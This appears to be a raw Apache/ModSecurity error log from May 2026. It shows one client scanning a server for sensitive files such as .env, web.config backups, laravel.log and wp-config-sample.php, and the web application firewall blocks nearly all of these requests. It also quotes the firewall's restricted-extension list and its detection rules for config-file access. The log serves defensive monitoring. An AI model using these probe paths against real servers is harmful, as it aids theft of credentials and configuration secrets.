[Mon May 11 22:01:56.232329 2026] [security2:error] [pid 1588898:tid 1588908] [client 193.111.117.35:58710] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1tKFW67LJTsgN3jQEcwAAAAk"]
[Mon May 11 22:01:56.903219 2026] [:error] [pid 1605480:tid 1605527] [client 193.111.117.35:58086] File does not exist: /var/www/html/wp-config-sample.php
[Mon May 11 22:01:56.903411 2026] [security2:error] [pid 1601130:tid 1601164] [client 193.111.117.35:58044] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/storage/logs/laravel.log"] [unique_id "agI1tHEgAO_835W6c1mNxgAAAE4"]
[Mon May 11 22:01:56.903643 2026] [security2:error] [pid 1601130:tid 1601164] [client 193.111.117.35:58044] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/storage/logs/laravel.log"] [unique_id "agI1tHEgAO_835W6c1mNxgAAAE4"]
[Mon May 11 22:01:56.904439 2026] [security2:error] [pid 1601130:tid 1601164] [client 193.111.117.35:58044] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1tHEgAO_835W6c1mNxgAAAE4"]
[Mon May 11 22:01:57.275302 2026] [security2:error] [pid 1605480:tid 1605539] [client 193.111.117.35:58960] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/web.config"] [unique_id "agI1tR2Cvzd_nyNfUm_2YAAAARE"]
[Mon May 11 22:01:57.275489 2026] [security2:error] [pid 1605480:tid 1605539] [client 193.111.117.35:58960] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/web.config"] [unique_id "agI1tR2Cvzd_nyNfUm_2YAAAARE"]
[Mon May 11 22:01:57.275641 2026] [security2:error] [pid 1605480:tid 1605539] [client 193.111.117.35:58960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/web.config"] [unique_id "agI1tR2Cvzd_nyNfUm_2YAAAARE"]
[Mon May 11 22:01:57.276233 2026] [security2:error] [pid 1605480:tid 1605539] [client 193.111.117.35:58960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1tR2Cvzd_nyNfUm_2YAAAARE"]
[Mon May 11 22:01:57.300066 2026] [security2:error] [pid 1590352:tid 1590394] [client 193.111.117.35:58964] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/web.config.bak"] [unique_id "agI1ta1q0G_aXAqWauTyZgAAAII"]
[Mon May 11 22:01:57.300304 2026] [security2:error] [pid 1590352:tid 1590394] [client 193.111.117.35:58964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/web.config.bak"] [unique_id "agI1ta1q0G_aXAqWauTyZgAAAII"]
[Mon May 11 22:01:57.302215 2026] [security2:error] [pid 1590352:tid 1590394] [client 193.111.117.35:58964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1ta1q0G_aXAqWauTyZgAAAII"]
[Mon May 11 22:01:57.311782 2026] [security2:error] [pid 1601130:tid 1601150] [client 193.111.117.35:58978] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config.bakup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/web.config.bakup"] [unique_id "agI1tXEgAO_835W6c1mNywAAAEA"]
[Mon May 11 22:01:57.312006 2026] [security2:error] [pid 1601130:tid 1601150] [client 193.111.117.35:58978] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/web.config.bakup"] [unique_id "agI1tXEgAO_835W6c1mNywAAAEA"]
[Mon May 11 22:01:57.312654 2026] [security2:error] [pid 1601130:tid 1601150] [client 193.111.117.35:58978] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1tXEgAO_835W6c1mNywAAAEA"]
[Mon May 11 22:01:57.317733 2026] [security2:error] [pid 1605480:tid 1605542] [client 193.111.117.35:58980] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/web.config.old"] [unique_id "agI1tR2Cvzd_nyNfUm_2YQAAARQ"]
[Mon May 11 22:01:57.317924 2026] [security2:error] [pid 1605480:tid 1605542] [client 193.111.117.35:58980] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/web.config.old"] [unique_id "agI1tR2Cvzd_nyNfUm_2YQAAARQ"]
[Mon May 11 22:01:57.318525 2026] [security2:error] [pid 1605480:tid 1605542] [client 193.111.117.35:58980] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1tR2Cvzd_nyNfUm_2YQAAARQ"]
[Mon May 11 22:01:57.353821 2026] [security2:error] [pid 1534836:tid 1534877] [client 193.111.117.35:59018] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/web.config.tmp"] [unique_id "agI1tdeaRXe5lR8y0ZOtGgAAAUY"]
[Mon May 11 22:01:57.354042 2026] [security2:error] [pid 1534836:tid 1534877] [client 193.111.117.35:59018] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/web.config.tmp"] [unique_id "agI1tdeaRXe5lR8y0ZOtGgAAAUY"]
[Mon May 11 22:01:57.354663 2026] [security2:error] [pid 1534836:tid 1534877] [client 193.111.117.35:59018] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1tdeaRXe5lR8y0ZOtGgAAAUY"]
[Mon May 11 22:01:57.379073 2026] [security2:error] [pid 1590352:tid 1590402] [client 193.111.117.35:59022] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/cms/Web.config"] [unique_id "agI1ta1q0G_aXAqWauTyZwAAAIo"]
[Mon May 11 22:01:57.379263 2026] [security2:error] [pid 1590352:tid 1590402] [client 193.111.117.35:59022] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /cms/web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cms/Web.config"] [unique_id "agI1ta1q0G_aXAqWauTyZwAAAIo"]
[Mon May 11 22:01:57.379474 2026] [security2:error] [pid 1590352:tid 1590402] [client 193.111.117.35:59022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cms/Web.config"] [unique_id "agI1ta1q0G_aXAqWauTyZwAAAIo"]
[Mon May 11 22:01:57.380124 2026] [security2:error] [pid 1590352:tid 1590402] [client 193.111.117.35:59022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1ta1q0G_aXAqWauTyZwAAAIo"]
[Mon May 11 22:01:57.398376 2026] [security2:error] [pid 1601130:tid 1601158] [client 193.111.117.35:59046] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/plugins/web.config"] [unique_id "agI1tXEgAO_835W6c1mNzAAAAEg"]
[Mon May 11 22:01:57.398544 2026] [security2:error] [pid 1601130:tid 1601158] [client 193.111.117.35:59046] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /plugins/web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/plugins/web.config"] [unique_id "agI1tXEgAO_835W6c1mNzAAAAEg"]
[Mon May 11 22:01:57.398739 2026] [security2:error] [pid 1601130:tid 1601158] [client 193.111.117.35:59046] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/plugins/web.config"] [unique_id "agI1tXEgAO_835W6c1mNzAAAAEg"]
[Mon May 11 22:01:57.399347 2026] [security2:error] [pid 1601130:tid 1601158] [client 193.111.117.35:59046] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1tXEgAO_835W6c1mNzAAAAEg"]
[Mon May 11 22:02:03.112270 2026] [security2:error] [pid 1534836:tid 1534878] [client 193.111.117.35:59474] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/services/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtJgAAAUc"]
[Mon May 11 22:02:03.112499 2026] [security2:error] [pid 1534836:tid 1534878] [client 193.111.117.35:59474] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/services/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtJgAAAUc"]
[Mon May 11 22:02:03.112636 2026] [security2:error] [pid 1590352:tid 1590400] [client 193.111.117.35:59492] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /functions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/functions/.env"] [unique_id "agI1u61q0G_aXAqWauTycAAAAIg"]
[Mon May 11 22:02:03.112771 2026] [security2:error] [pid 1588898:tid 1588922] [client 193.111.117.35:59434] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /packages/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/packages/.env"] [unique_id "agI1u6FW67LJTsgN3jQEigAAABg"]
[Mon May 11 22:02:03.112792 2026] [security2:error] [pid 1590352:tid 1590400] [client 193.111.117.35:59492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/functions/.env"] [unique_id "agI1u61q0G_aXAqWauTycAAAAIg"]
[Mon May 11 22:02:03.112969 2026] [security2:error] [pid 1588898:tid 1588922] [client 193.111.117.35:59434] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/packages/.env"] [unique_id "agI1u6FW67LJTsgN3jQEigAAABg"]
[Mon May 11 22:02:03.113387 2026] [security2:error] [pid 1590352:tid 1590400] [client 193.111.117.35:59492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u61q0G_aXAqWauTycAAAAIg"]
[Mon May 11 22:02:03.113703 2026] [security2:error] [pid 1588898:tid 1588922] [client 193.111.117.35:59434] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u6FW67LJTsgN3jQEigAAABg"]
